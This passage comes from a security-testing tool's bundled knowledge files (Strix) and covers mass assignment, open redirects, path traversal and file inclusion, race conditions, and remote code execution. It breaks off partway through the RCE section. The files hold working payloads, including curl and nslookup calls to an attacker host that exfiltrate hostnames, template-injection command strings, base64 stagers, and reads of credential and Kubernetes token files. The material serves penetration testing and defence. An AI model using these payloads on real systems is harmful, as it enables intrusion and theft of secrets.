server-side\n5. For archives, extract in a chroot/jail with explicit allowlist; drop symlinks and reject traversal\n6. Test finalize/complete steps in resumable flows; many validations only run on init\n7. Verify background processors with EICAR and tiny polyglots\n8. When you cannot get execution, aim for stored XSS or header-driven script execution\n9. Validate that CDNs honor attachment/nosniff\n10. Document full pipeline behavior per asset type\n\n## Summary\n\nSecure uploads are a pipeline property. Enforce strict type, size, and header controls; transform or strip active content; never execute or inline-render untrusted uploads; and keep storage private with controlled, signed access.\n" }, { "path": "strix/skills/vulnerabilities/mass_assignment.md", "content": "---\nname: mass-assignment\ndescription: Mass assignment testing for unauthorized field binding and privilege escalation via API parameters\n---\n\n# Mass Assignment\n\nMass assignment binds client-supplied fields directly into models/DTOs without field-level allowlists. It commonly leads to privilege escalation, ownership changes, and unauthorized state transitions in modern APIs and GraphQL.\n\n## Attack Surface\n\n- REST/JSON, GraphQL inputs, form-encoded and multipart bodies\n- Model binding in controllers/resolvers; ORM create/update helpers\n- Writable nested relations, sparse/patch updates, bulk endpoints\n\n## Reconnaissance\n\n### Surface Map\n\n- Controllers with automatic binding (e.g., request.json β†’ model)\n- GraphQL input types mirroring models; admin/staff tools exposed via API\n- OpenAPI/GraphQL schemas: uncover hidden fields or enums\n- Client bundles and mobile apps: inspect forms and mutation payloads for field names\n\n### Parameter Strategies\n\n- Flat fields: `isAdmin`, `role`, `roles[]`, `permissions[]`, `status`, `plan`, `tier`, `premium`, `verified`, `emailVerified`\n- Ownership/tenancy: `userId`, `ownerId`, `accountId`, `organizationId`, `tenantId`, `workspaceId`\n- Limits/quotas: `usageLimit`, `seatCount`, `maxProjects`, `creditBalance`\n- Feature flags/gates: `features`, `flags`, `betaAccess`, `allowImpersonation`\n- Billing: `price`, `amount`, `currency`, `prorate`, `nextInvoice`, `trialEnd`\n\n### Shape Variants\n\n- Alternate shapes: arrays vs scalars; nested JSON; objects under unexpected keys\n- Dot/bracket paths: `profile.role`, `profile[role]`, `settings[roles][]`\n- Duplicate keys and precedence: `{\"role\":\"user\",\"role\":\"admin\"}`\n- Sparse/patch formats: JSON Patch/JSON Merge Patch; try adding forbidden paths\n\n### Encodings and Channels\n\n- Content-types: `application/json`, `application/x-www-form-urlencoded`, `multipart/form-data`, `text/plain`\n- GraphQL: add suspicious fields to input objects; overfetch response to detect changes\n- Batch/bulk: arrays of objects; verify per-item allowlists not skipped\n\n## Key Vulnerabilities\n\n### Privilege Escalation\n\n- Set role/isAdmin/permissions during signup/profile update\n- Toggle admin/staff flags where exposed\n\n### Ownership Takeover\n\n- Change ownerId/accountId/tenantId to seize resources\n- Move objects across users/tenants\n\n### Feature Gate Bypass\n\n- Enable premium/beta/feature flags via flags/features fields\n- Raise limits/seatCount/quotas\n\n### Billing and Entitlements\n\n- Modify plan/price/prorate/trialEnd or creditBalance\n- Bypass server recomputation\n\n### Nested and Relation Writes\n\n- Writable nested serializers or ORM relations allow creating or linking related objects beyond caller's scope\n\n## Advanced Techniques\n\n### GraphQL Specific\n\n- Field-level authz missing on input types: attempt forbidden fields in mutation inputs\n- Combine with aliasing/batching to compare effects\n- Use fragments to overfetch changed fields immediately after mutation\n\n### ORM Framework Edges\n\n- **Rails**: strong parameters misconfig or deep nesting via `accepts_nested_attributes_for`\n- **Laravel**: $fillable/$guarded misuses; `guarded=[]` opens all; casts mutating hidden fields\n- **Django REST Framework**: writable nested serializer, read_only/extra_kwargs gaps, partial updates\n- **Mongoose/Prisma**: schema paths not filtered; `select:false` doesn't prevent writes; upsert defaults\n\n### Parser and Validator Gaps\n\n- Validators run post-bind and do not cover extra fields\n- Unknown fields silently dropped in response but persisted underneath\n- Inconsistent allowlists between mobile/web/gateway; alt encodings bypass validation pipeline\n\n## Bypass Techniques\n\n### Content-Type Switching\n\n- Switch JSON ↔ form-encoded ↔ multipart ↔ text/plain; some code paths only validate one\n\n### Key Path Variants\n\n- Dot/bracket/object re-shaping to reach nested fields through different binders\n\n### Batch Paths\n\n- Per-item checks skipped in bulk operations\n- Insert a single malicious object within a large batch\n\n### Race and Reorder\n\n- Race two updates: first sets forbidden field, second normalizes\n- Final state may retain forbidden change\n\n## Testing Methodology\n\n1. **Identify endpoints** - Create/update endpoints and GraphQL mutations\n2. **Capture responses** - Observe returned fields to build candidate list\n3. **Build sensitive-field dictionary** - Per resource: role, isAdmin, ownerId, status, plan, limits, flags\n4. **Inject candidates** - Alongside legitimate updates across transports and encodings\n5. **Compare state** - Before/after diffs across roles\n6. **Test variations** - Nested objects, arrays, alternative shapes, duplicate keys, batch operations\n\n## Validation\n\n1. Show a minimal request where adding a sensitive field changes persisted state for a non-privileged caller\n2. Provide before/after evidence (response body, subsequent GET, or GraphQL query) proving the forbidden attribute value\n3. Demonstrate consistency across at least two encodings or channels\n4. For nested/bulk, show that protected fields are written within child objects or array elements\n5. Quantify impact (e.g., role flip, cross-tenant move, quota increase) and reproducibility\n\n## False Positives\n\n- Server recomputes derived fields (plan/price/role) ignoring client input\n- Fields marked read-only and enforced consistently across encodings\n- Only UI-side changes with no persisted effect\n\n## Impact\n\n- Privilege escalation and admin feature access\n- Cross-tenant or cross-account resource takeover\n- Financial/billing manipulation and quota abuse\n- Policy/approval bypass by toggling verification or status flags\n\n## Pro Tips\n\n1. Build a sensitive-field dictionary per resource and fuzz systematically\n2. Always try alternate shapes and encodings; many validators are shape/CT-specific\n3. For GraphQL, diff the resource immediately after mutation; effects are often visible even if the mutation returns filtered fields\n4. Inspect SDKs/mobile apps for hidden field names and nested write examples\n5. Prefer minimal PoCs that prove durable state changes; avoid UI-only effects\n\n## Summary\n\nMass assignment is eliminated by explicit mapping and per-field authorization. Treat every client-supplied attributeβ€”especially nested or batch inputsβ€”as untrusted until validated against an allowlist and caller scope.\n" }, { "path": "strix/skills/vulnerabilities/open_redirect.md", "content": "---\nname: open-redirect\ndescription: Open redirect testing for phishing pivots, OAuth token theft, and allowlist bypass\n---\n\n# Open Redirect\n\nOpen redirects enable phishing, OAuth/OIDC code and token theft, and allowlist bypass in server-side fetchers that follow redirects. Treat every redirect target as untrusted: canonicalize and enforce exact allowlists per scheme, host, and path.\n\n## Attack Surface\n\n**Server-Driven Redirects**\n- HTTP 3xx Location\n\n**Client-Driven Redirects**\n- `window.location`, meta refresh, SPA routers\n\n**OAuth/OIDC/SAML Flows**\n- `redirect_uri`, `post_logout_redirect_uri`, `RelayState`, `returnTo`/`continue`/`next`\n\n**Multi-Hop Chains**\n- Only first hop validated\n\n## High-Value Targets\n\n- Login/logout, password reset, SSO/OAuth flows\n- Payment gateways, email links, invite/verification\n- Unsubscribe, language/locale switches\n- `/out` or `/r` redirectors\n\n## Reconnaissance\n\n### Injection Points\n\n- Params: `redirect`, `url`, `next`, `return_to`, `returnUrl`, `continue`, `goto`, `target`, `callback`, `out`, `dest`, `back`, `to`, `r`, `u`\n- OAuth/OIDC/SAML: `redirect_uri`, `post_logout_redirect_uri`, `RelayState`, `state`\n- SPA: `router.push`/`replace`, `location.assign`/`href`, meta refresh, `window.open`\n- Headers: `Host`, `X-Forwarded-Host`/`Proto`, `Referer`; server-side Location echo\n\n### Parser Differentials\n\n**Userinfo**\n- `https://trusted.com@evil.com` β†’ validators parse host as trusted.com, browser navigates to evil.com\n- Variants: `trusted.com%40evil.com`, `a%40evil.com%40trusted.com`\n\n**Backslash and Slashes**\n- `https://trusted.com\\evil.com`, `https://trusted.com\\@evil.com`, `///evil.com`, `/\\evil.com`\n\n**Whitespace and Control**\n- `http%09://evil.com`, `http%0A://evil.com`, `trusted.com%09evil.com`\n\n**Fragment and Query**\n- `trusted.com#@evil.com`, `trusted.com?//@evil.com`, `?next=//evil.com#@trusted.com`\n\n**Unicode and IDNA**\n- Punycode/IDN: `truΡ•ted.com` (Cyrillic), `trusted.com。evil.com` (full-width dot), trailing dot\n\n### Encoding Bypasses\n\n- Double encoding: `%2f%2fevil.com`, `%252f%252fevil.com`\n- Mixed case and scheme smuggling: `hTtPs://evil.com`, `http:evil.com`\n- IP variants: decimal 2130706433, octal 0177.0.0.1, hex 0x7f.1, IPv6 `[::ffff:127.0.0.1]`\n- User-controlled path bases: `/out?url=/\\evil.com`\n\n## Key Vulnerabilities\n\n### Allowlist Evasion\n\n**Common Mistakes**\n- Substring/regex contains checks: allows `trusted.com.evil.com`\n- Wildcards: `*.trusted.com` also matches `attacker.trusted.com.evil.net`\n- Missing scheme pinning: `data:`, `javascript:`, `file:`, `gopher:` accepted\n- Case/IDN drift between validator and browser\n\n**Robust Validation**\n- Canonicalize with a single modern URL parser (WHATWG URL)\n- Compare exact scheme, hostname (post-IDNA), and an explicit allowlist with optional exact path prefixes\n- Require absolute HTTPS; reject protocol-relative `//` and unknown schemes\n\n### OAuth/OIDC/SAML\n\n**Redirect URI Abuse**\n- Using an open redirect on a trusted domain for redirect_uri enables code interception\n- Weak prefix/suffix checks: `https://trusted.com` β†’ `https://trusted.com.evil.com`\n- Path traversal/canonicalization: `/oauth/../../@evil.com`\n- `post_logout_redirect_uri` often less strictly validated\n\n### Client-Side Vectors\n\n**JavaScript Redirects**\n- `location.href`/`assign`/`replace` using user input\n- Meta refresh `content=0;url=USER_INPUT`\n- SPA routers: `router.push(searchParams.get('next'))`\n\n### Reverse Proxies and Gateways\n\n- Host/X-Forwarded-* may change absolute URL construction\n- CDNs that follow redirects for link checking can leak tokens when chained\n\n### SSRF Chaining\n\n- Server-side fetchers (web previewers, link unfurlers) follow 3xx\n- Combine with an open redirect on an allowlisted domain to pivot to internal targets (169.254.169.254, localhost)\n\n## Exploitation Scenarios\n\n### OAuth Code Interception\n\n1. Set redirect_uri to `https://trusted.example/out?url=https://attacker.tld/cb`\n2. IdP sends code to trusted.example which redirects to attacker.tld\n3. Exchange code for tokens; demonstrate account access\n\n### Phishing Flow\n\n1. Send link on trusted domain: `/login?next=https://attacker.tld/fake`\n2. Victim authenticates; browser navigates to attacker page\n3. Capture credentials/tokens via cloned UI\n\n### Internal Evasion\n\n1. Server-side link unfurler fetches `https://trusted.example/out?u=http://169.254.169.254/latest/meta-data`\n2. Redirect follows to metadata; confirm via timing/headers\n\n## Testing Methodology\n\n1. **Inventory surfaces** - Login/logout, password reset, SSO/OAuth flows, payment gateways, email links\n2. **Build test matrix** - Scheme Γ— host Γ— path variants and encoding/unicode forms\n3. **Compare behaviors** - Server-side validation vs browser navigation results\n4. **Multi-hop testing** - Trusted-domain β†’ redirector β†’ external\n5. **Prove impact** - Credential phishing, OAuth code interception, internal egress\n\n## Validation\n\n1. Produce a minimal URL that navigates to an external domain via the vulnerable surface; include the full address bar capture\n2. Show bypass of the stated validation (regex/allowlist) using canonicalization variants\n3. Test multi-hop: prove only first hop is validated and second hop escapes constraints\n4. For OAuth/SAML, demonstrate code/RelayState delivery to an attacker-controlled endpoint\n\n## False Positives\n\n- Redirects constrained to relative same-origin paths with robust normalization\n- Exact pre-registered OAuth redirect_uri with strict verifier\n- Validators using a single canonical parser and comparing post-IDNA host and scheme\n- User prompts that show the exact final destination before navigating\n\n## Impact\n\n- Credential and token theft via phishing and OAuth/OIDC interception\n- Internal data exposure when server fetchers follow redirects\n- Policy bypass where allowlists are enforced only on the first hop\n- Cross-application trust erosion and brand abuse\n\n## Pro Tips\n\n1. Always compare server-side canonicalization to real browser navigation; differences reveal bypasses\n2. Try userinfo, protocol-relative, Unicode/IDN, and IP numeric variants early\n3. In OAuth, prioritize `post_logout_redirect_uri` and less-discussed flows; they're often looser\n4. Exercise multi-hop across distinct subdomains and paths\n5. For SSRF chaining, target services known to follow redirects\n6. Favor allowlists of exact origins plus optional path prefixes\n7. Keep a curated suite of redirect payloads per runtime (Java, Node, Python, Go)\n\n## Summary\n\nRedirection is safe only when the final destination is constrained after canonicalization. Enforce exact origins, verify per hop, and treat client-provided destinations as untrusted across every stack.\n" }, { "path": "strix/skills/vulnerabilities/path_traversal_lfi_rfi.md", "content": "---\nname: path-traversal-lfi-rfi\ndescription: Path traversal and file inclusion testing for local/remote file access and code execution\n---\n\n# Path Traversal / LFI / RFI\n\nImproper file path handling and dynamic inclusion enable sensitive file disclosure, config/source leakage, SSRF pivots, and code execution. Treat all user-influenced paths, names, and schemes as untrusted; normalize and bind them to an allowlist or eliminate user control entirely.\n\n## Attack Surface\n\n**Path Traversal**\n- Read files outside intended roots via `../`, encoding, normalization gaps\n\n**Local File Inclusion (LFI)**\n- Include server-side files into interpreters/templates\n\n**Remote File Inclusion (RFI)**\n- Include remote resources (HTTP/FTP/wrappers) for code execution\n\n**Archive Extraction**\n- Zip Slip: write outside target directory upon unzip/untar\n\n**Normalization Mismatches**\n- Server/proxy differences (nginx alias/root, upstream decoders)\n- OS-specific paths: Windows separators, device names, UNC, NT paths, alternate data streams\n\n## High-Value Targets\n\n**Unix**\n- `/etc/passwd`, `/etc/hosts`, application `.env`/`config.yaml`\n- SSH keys, cloud creds, service configs/logs\n\n**Windows**\n- `C:\\Windows\\win.ini`, IIS/web.config, programdata configs, application logs\n\n**Application**\n- Source code templates and server-side includes\n- Secrets in env dumps, framework caches\n\n## Reconnaissance\n\n### Surface Map\n\n- HTTP params: `file`, `path`, `template`, `include`, `page`, `view`, `download`, `export`, `report`, `log`, `dir`, `theme`, `lang`\n- Upload and conversion pipelines: image/PDF renderers, thumbnailers, office converters\n- Archive extract endpoints and background jobs; imports with ZIP/TAR/GZ/7z\n- Server-side template rendering (PHP/Smarty/Twig/Blade), email templates, CMS themes/plugins\n- Reverse proxies and static file servers (nginx, CDN) in front of app handlers\n\n### Capability Probes\n\n- Path traversal baseline: `../../etc/hosts` and `C:\\Windows\\win.ini`\n- Encodings: `%2e%2e%2f`, `%252e%252e%252f`, `..%2f`, `..%5c`, mixed UTF-8 (`%c0%2e`), Unicode dots and slashes\n- Normalization tests: `..../`, `..\\\\`, `././`, trailing dot/double dot segments; repeated decoding\n- Absolute path acceptance: `/etc/passwd`, `C:\\Windows\\System32\\drivers\\etc\\hosts`\n- Server mismatch: `/static/..;/../etc/passwd` (\"..;\"), encoded slashes (`%2F`), double-decoding via upstream\n\n## Detection Channels\n\n### Direct\n\n- Response body discloses file content (text, binary, base64)\n- Error pages echo real paths\n\n### Error-Based\n\n- Exception messages expose canonicalized paths or `include()` warnings with real filesystem locations\n\n### OAST\n\n- RFI/LFI with wrappers that trigger outbound fetches (HTTP/DNS) to confirm inclusion/execution\n\n### Side Effects\n\n- Archive extraction writes files unexpectedly outside target\n- Verify with directory listings or follow-up reads\n\n## Key Vulnerabilities\n\n### Path Traversal Bypasses\n\n**Encodings**\n- Single/double URL-encoding, mixed case, overlong UTF-8, UTF-16, path normalization oddities\n\n**Mixed Separators**\n- `/` and `\\\\` on Windows; `//` and `\\\\\\\\` collapse differences across frameworks\n\n**Dot Tricks**\n- `....//` (double dot folding), trailing dots (Windows), trailing slashes, appended valid extension\n\n**Absolute Path Injection**\n- Bypass joins by supplying a rooted path\n\n**Alias/Root Mismatch**\n- nginx alias without trailing slash with nested location allows `../` to escape\n- Try `/static/../etc/passwd` and \";\" variants (`..;`)\n\n**Upstream vs Backend Decoding**\n- Proxies/CDNs decoding `%2f` differently; test double-decoding and encoded dots\n\n### LFI Wrappers and Techniques\n\n**PHP Wrappers**\n- `php://filter/convert.base64-encode/resource=index.php` (read source)\n- `zip://archive.zip#file.txt`\n- `data://text/plain;base64`\n- `expect://` (if enabled)\n\n**Log/Session Poisoning**\n- Inject PHP/templating payloads into access/error logs or session files then include them\n\n**Upload Temp Names**\n- Include temporary upload files before relocation; race with scanners\n\n**Proc and Caches**\n- `/proc/self/environ` and framework-specific caches for readable secrets\n\n**Legacy Tricks**\n- Null-byte (`%00`) truncation in older stacks; path length truncation\n\n### Template Engines\n\n- PHP include/require; Smarty/Twig/Blade with dynamic template names\n- Java/JSP/FreeMarker/Velocity; Node.js ejs/handlebars/pug engines\n- Seek dynamic template resolution from user input (theme/lang/template)\n\n### RFI Conditions\n\n**Requirements**\n- Remote includes (`allow_url_include`/`allow_url_fopen` in PHP)\n- Custom fetchers that eval/execute retrieved content\n- SSRF-to-exec bridges\n\n**Protocol Handlers**\n- http, https, ftp; language-specific stream handlers\n\n**Exploitation**\n- Host a minimal payload that proves code execution\n- Prefer OAST beacons or deterministic output over heavy shells\n- Chain with upload or log poisoning when remote includes are disabled\n\n### Archive Extraction (Zip Slip)\n\n- Files within archives containing `../` or absolute paths escape target extract directory\n- Test multiple formats: zip/tar/tgz/7z\n- Verify symlink handling and path canonicalization prior to write\n- Impact: overwrite config/templates or drop webshells into served directories\n\n## Testing Methodology\n\n1. **Inventory file operations** - Downloads, previews, templates, logs, exports/imports, report engines, uploads, archive extractors\n2. **Identify input joins** - Path joins (base + user), include/require/template loads, resource fetchers, archive extract destinations\n3. **Probe normalization** - Separators, encodings, double-decodes, case, trailing dots/slashes\n4. **Compare behaviors** - Web server vs application behavior\n5. **Escalate** - From disclosure (read) to influence (write/extract/include), then to execution (wrapper/engine chains)\n\n## Validation\n\n1. Show a minimal traversal read proving out-of-root access (e.g., `/etc/hosts`) with a same-endpoint in-root control\n2. For LFI, demonstrate inclusion of a benign local file or harmless wrapper output (`php://filter` base64 of index.php)\n3. For RFI, prove remote fetch by OAST or controlled output; avoid destructive payloads\n4. For Zip Slip, create an archive with `../` entries and show write outside target (e.g., marker file read back)\n5. Provide before/after file paths, exact requests, and content hashes/lengths for reproducibility\n\n## False Positives\n\n- In-app virtual paths that do not map to filesystem; content comes from safe stores (DB/object storage)\n- Canonicalized paths constrained to an allowlist/root after normalization\n- Wrappers disabled and includes using constant templates only\n- Archive extractors that sanitize paths and enforce destination directories\n\n## Impact\n\n- Sensitive configuration/source disclosure β†’ credential and key compromise\n- Code execution via inclusion of attacker-controlled content or overwritten templates\n- Persistence via dropped files in served directories; lateral movement via revealed secrets\n- Supply-chain impact when report/template engines execute attacker-influenced files\n\n## Pro Tips\n\n1. Compare content-length/ETag when content is masked; read small canonical files (hosts) to avoid noise\n2. Test proxy/CDN and app separately; decoding/normalization order differs, especially for `%2f` and `%2e` encodings\n3. For LFI, prefer `php://filter` base64 probes over destructive payloads; enumerate readable logs and sessions\n4. Validate extraction code with synthetic archives; include symlinks and deep `../` chains\n5. Use minimal PoCs and hard evidence (hashes, paths). Avoid noisy DoS against filesystems\n\n## Summary\n\nEliminate user-controlled paths where possible. Otherwise, resolve to canonical paths and enforce allowlists, forbid remote schemes, and lock down interpreters and extractors. Normalize consistently at the boundary closest to IO.\n" }, { "path": "strix/skills/vulnerabilities/race_conditions.md", "content": "---\nname: race-conditions\ndescription: Race condition testing for TOCTOU bugs, double-spend, and concurrent state manipulation\n---\n\n# Race Conditions\n\nConcurrency bugs enable duplicate state changes, quota bypass, financial abuse, and privilege errors. Treat every read–modify–write and multi-step workflow as adversarially concurrent.\n\n## Attack Surface\n\n**Read-Modify-Write**\n- Sequences without atomicity or proper locking\n\n**Multi-Step Operations**\n- Check β†’ reserve β†’ commit with gaps between phases\n\n**Cross-Service Workflows**\n- Sagas, async jobs with eventual consistency\n\n**Rate Limits and Quotas**\n- Controls implemented at the edge only\n\n## High-Value Targets\n\n- Payments: auth/capture/refund/void; credits/loyalty points; gift cards\n- Coupons/discounts: single-use codes, stacking checks, per-user limits\n- Quotas/limits: API usage, inventory reservations, seat counts, vote limits\n- Auth flows: password reset/OTP consumption, session minting, device trust\n- File/object storage: multi-part finalize, version writes, share-link generation\n- Background jobs: export/import create/finalize endpoints; job cancellation/approve\n- GraphQL mutations and batch operations; WebSocket actions\n\n## Reconnaissance\n\n### Identify Race Windows\n\n- Look for explicit sequences: \"check balance then deduct\", \"verify coupon then apply\", \"check inventory then purchase\"\n- Watch for optimistic concurrency markers: ETag/If-Match, version fields, updatedAt checks\n- Examine idempotency-key support: scope (path vs principal), TTL, and persistence (cache vs DB)\n- Map cross-service steps: when is state written vs published, what retries/compensations exist\n\n### Signals\n\n- Sequential request fails but parallel succeeds\n- Duplicate rows, negative counters, over-issuance, or inconsistent aggregates\n- Distinct response shapes/timings for simultaneous vs sequential requests\n- Audit logs out of order; multiple 2xx for the same intent; missing or duplicate correlation IDs\n\n## Key Vulnerabilities\n\n### Request Synchronization\n\n- HTTP/2 multiplexing for tight concurrency; send many requests on warmed connections\n- Last-byte synchronization: hold requests open and release final byte simultaneously\n- Connection warming: pre-establish sessions, cookies, and TLS to remove jitter\n\n### Idempotency and Dedup Bypass\n\n- Reuse the same idempotency key across different principals/paths if scope is inadequate\n- Hit the endpoint before the idempotency store is written (cache-before-commit windows)\n- App-level dedup drops only the response while side effects (emails/credits) still occur\n\n### Atomicity Gaps\n\n- Lost update: read-modify-write increments without atomic DB statements\n- Partial two-phase workflows: success committed before validation completes\n- Unique checks done outside a unique index/upsert: create duplicates under load\n\n### Cross-Service Races\n\n- Saga/compensation timing gaps: execute compensation without preventing the original success path\n- Eventual consistency windows: act in Service B before Service A's write is visible\n- Retry storms: duplicate side effects due to at-least-once delivery without idempotent consumers\n\n### Rate Limits and Quotas\n\n- Per-IP or per-connection enforcement: bypass with multiple IPs/sessions\n- Counter updates not atomic or sharded inconsistently; send bursts before counters propagate\n\n### Optimistic Concurrency Evasion\n\n- Omit If-Match/ETag where optional; supply stale versions if server ignores them\n- Version fields accepted but not validated across all code paths (e.g., GraphQL vs REST)\n\n### Database Isolation\n\n- Exploit READ COMMITTED/REPEATABLE READ anomalies: phantoms, non-serializable sequences\n- Upsert races: use unique indexes with proper ON CONFLICT/UPSERT or exploit naive existence checks\n- Lock granularity issues: row vs table; application locks held only in-process\n\n### Distributed Locks\n\n- Redis locks without NX/EX or fencing tokens allow multiple winners\n- Locks stored in memory on a single node; bypass by hitting other nodes/regions\n\n## Bypass Techniques\n\n- Distribute across IPs, sessions, and user accounts to evade per-entity throttles\n- Switch methods/content-types/endpoints that trigger the same state change via different code paths\n- Intentionally trigger timeouts to provoke retries that cause duplicate side effects\n- Degrade the target (large payloads, slow endpoints) to widen race windows\n\n## Special Contexts\n\n### GraphQL\n\n- Parallel mutations and batched operations may bypass per-mutation guards\n- Ensure resolver-level idempotency and atomicity\n- Persisted queries and aliases can hide multiple state changes in one request\n\n### WebSocket\n\n- Per-message authorization and idempotency must hold\n- Concurrent emits can create duplicates if only the handshake is checked\n\n### Files and Storage\n\n- Parallel finalize/complete on multi-part uploads can create duplicate or corrupted objects\n- Re-use pre-signed URLs concurrently\n\n### Auth Flows\n\n- Concurrent consumption of one-time tokens (reset codes, magic links) to mint multiple sessions\n- Verify consume is atomic\n\n## Chaining Attacks\n\n- Race + Business logic: violate invariants (double-refund, limit slicing)\n- Race + IDOR: modify or read others' resources before ownership checks complete\n- Race + CSRF: trigger parallel actions from a victim to amplify effects\n- Race + Caching: stale caches re-serve privileged states after concurrent changes\n\n## Testing Methodology\n\n1. **Model invariants** - Conservation of value, uniqueness, maximums for each workflow\n2. **Identify reads/writes** - Where they occur (service, DB, cache)\n3. **Baseline** - Single requests to establish expected behavior\n4. **Concurrent requests** - Issue parallel requests with identical inputs; observe deltas\n5. **Scale and synchronize** - Ramp up parallelism, use HTTP/2, align timing (last-byte sync)\n6. **Cross-channel** - Test across web, API, GraphQL, WebSocket\n7. **Confirm durability** - Verify state changes persist and are reproducible\n\n## Validation\n\n1. Single request denied; N concurrent requests succeed where only 1 should\n2. Durable state change proven (ledger entries, inventory counts, role/flag changes)\n3. Reproducible under controlled synchronization (HTTP/2, last-byte sync) across multiple runs\n4. Evidence across channels (e.g., REST and GraphQL) if applicable\n5. Include before/after state and exact request set used\n\n## False Positives\n\n- Truly idempotent operations with enforced ETag/version checks or unique constraints\n- Serializable transactions or correct advisory locks/queues\n- Visual-only glitches without durable state change\n- Rate limits that reject excess with atomic counters\n\n## Impact\n\n- Financial loss (double spend, over-issuance of credits/refunds)\n- Policy/limit bypass (quotas, single-use tokens, seat counts)\n- Data integrity corruption and audit trail inconsistencies\n- Privilege or role errors due to concurrent updates\n\n## Pro Tips\n\n1. Favor HTTP/2 with warmed connections; add last-byte sync for precision\n2. Start small (N=5–20), then scale; too much noise can mask the window\n3. Target read–modify–write code paths and endpoints with idempotency keys\n4. Compare REST vs GraphQL vs WebSocket; protections often differ\n5. Look for cross-service gaps (queues, jobs, webhooks) and retry semantics\n6. Check unique constraints and upsert usage; avoid relying on pre-insert checks\n7. Use correlation IDs and logs to prove concurrent interleaving\n8. Widen windows by adding server load or slow backend dependencies\n9. Validate on production-like latency; some races only appear under real load\n10. Document minimal, repeatable request sets that demonstrate durable impact\n\n## Summary\n\nConcurrency safety is a property of every path that mutates state. If any path lacks atomicity, proper isolation, or idempotency, parallel requests will eventually break invariants.\n" }, { "path": "strix/skills/vulnerabilities/rce.md", "content": "---\nname: rce\ndescription: RCE testing covering command injection, deserialization, template injection, and code evaluation\n---\n\n# RCE\n\nRemote code execution leads to full server control when input reaches code execution primitives: OS command wrappers, dynamic evaluators, template engines, deserializers, media pipelines, and build/runtime tooling. Focus on quiet, portable oracles and chain to stable shells only when needed.\n\n## Attack Surface\n\n**Command Execution**\n- OS command execution via wrappers (shells, system utilities, CLIs)\n\n**Dynamic Evaluation**\n- Template engines, expression languages, eval/vm\n\n**Deserialization**\n- Insecure deserialization and gadget chains across languages\n\n**Media Pipelines**\n- ImageMagick, Ghostscript, ExifTool, LaTeX, ffmpeg\n\n**SSRF Chains**\n- Internal services exposing execution primitives (FastCGI, Redis)\n\n**Container Escalation**\n- App RCE to node/cluster compromise via Docker/Kubernetes\n\n## Detection Channels\n\n### Time-Based\n\n**Unix**\n- `;sleep 1`, `` `sleep 1` ``, `|| sleep 1`\n- Gate delays with short subcommands to reduce noise\n\n**Windows**\n- CMD: `& timeout /t 2 &`, `ping -n 2 127.0.0.1`\n- PowerShell: `Start-Sleep -s 2`\n\n### OAST\n\n**DNS**\n```bash\nnslookup $(whoami).x.attacker.tld\n```\n\n**HTTP**\n```bash\ncurl https://attacker.tld/$(hostname)\n```\n\n### Output-Based\n\n**Direct**\n```bash\n;id;uname -a;whoami\n```\n\n**Encoded**\n```bash\n;(id;hostname)|base64\n```\n\n## Key Vulnerabilities\n\n### Command Injection\n\n**Delimiters and Operators**\n- Unix: `; | || & && `cmd` $(cmd) $() ${IFS}` newline/tab\n- Windows: `& | || ^`\n\n**Argument Injection**\n- Inject flags/filenames into CLI arguments (e.g., `--output=/tmp/x`, `--config=`)\n- Break out of quoted segments by alternating quotes and escapes\n- Environment expansion: `$PATH`, `${HOME}`, command substitution\n- Windows: `%TEMP%`, `!VAR!`, PowerShell `$(...)`\n\n**Path and Builtin Confusion**\n- Force absolute paths (`/usr/bin/id`) vs relying on PATH\n- Use builtins or alternative tools (`printf`, `getent`) when `id` is filtered\n- Use `sh -c` or `cmd /c` wrappers to reach the shell\n\n**Evasion**\n- Whitespace/IFS: `${IFS}`, `$'\\t'`, `<`\n- Token splitting: `w'h'o'a'm'i`, `w\"h\"o\"a\"m\"i`\n- Variable building: `a=i;b=d; $a$b`\n- Base64 stagers: `echo payload | base64 -d | sh`\n- PowerShell: `IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)))`\n\n### Template Injection\n\nIdentify server-side template engines: Jinja2/Twig/Blade/Freemarker/Velocity/Thymeleaf/EJS/Handlebars/Pug\n\n**Minimal Probes**\n```\nJinja2: {{7*7}} β†’ {{cycler.__init__.__globals__['os'].popen('id').read()}}\nTwig: {{7*7}} β†’ {{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}\nFreemarker: ${7*7} β†’ <#assign ex=\"freemarker.template.utility.Execute\"?new()>${ ex(\"id\") }\nEJS: <%= global.process.mainModule.require('child_process').execSync('id') %>\n```\n\n### Deserialization and EL\n\n**Java**\n- Gadget chains via CommonsCollections/BeanUtils/Spring\n- Tools: ysoserial\n- JNDI/LDAP chains (Log4Shell-style) when lookups are reachable\n\n**.NET**\n- BinaryFormatter/DataContractSerializer\n- APIs accepting untrusted ViewState without MAC\n\n**PHP**\n- `unserialize()` and PHAR metadata\n- Autoloaded gadget chains in frameworks and plugins\n\n**Python/Ruby**\n- pickle, `yaml.load`/`unsafe_load`, Marshal\n- Auto-deserialization in message queues/caches\n\n**Expression Languages**\n- OGNL/SpEL/MVEL/EL reaching Runtime/ProcessBuilder/exec\n\n### Media and Document Pipelines\n\n**ImageMagick/GraphicsMagick**\n- policy.xml may limit delegates; still test legacy vectors\n```\npush graphic-context\nfill 'url(https://x.tld/a\"|id>/tmp/o\")'\npop graphic-context\n```\n\n**Ghostscript**\n- PostScript in PDFs/PS: `%pipe%id` file operators\n\n**ExifTool**\n- Crafted metadata invoking external tools or library bugs\n\n**LaTeX**\n- `\\write18`/`--shell-escape`, `\\input` piping; pandoc filters\n\n**ffmpeg**\n- concat/protocol tricks mediated by compile-time flags\n\n### SSRF to RCE\n\n**FastCGI**\n- `gopher://` to php-fpm (build FPM records to invoke system/exec)\n\n**Redis**\n- `gopher://` write cron/authorized_keys or webroot\n- Module load when allowed\n\n**Admin Interfaces**\n- Jenkins script console, Spark UI, Jupyter kernels reachable internally\n\n### Container and Kubernetes\n\n**Docker**\n- From app RCE, inspect `/.dockerenv`, `/proc/1/cgroup`\n- Enumerate mounts and capabilities: `capsh --print`\n- Abuses: mounted docker.sock, hostPath mounts, privileged containers\n- Write to `/proc/sys/kernel/core_pattern` or mount host with `--privileged`\n\n**Kubernetes**\n- Steal service account token from `/var/run/secrets/kubernetes.io/serviceaccount`\n- Query API for pods/secrets; enumerate RBAC\n- Talk to kubelet on 10250/10255; exec into pods\n- Escalate via privileged pods, hostPath mounts, or daemonsets\n\n## Bypass Techniques\n\n**Encoding Differentials**\n- URL encoding, Unicode normalization, comment insertion, mixed case\n- Request smuggling to reach alternate parsers\n\n**Binary Alternatives**\n- Absolute paths and alternate binaries 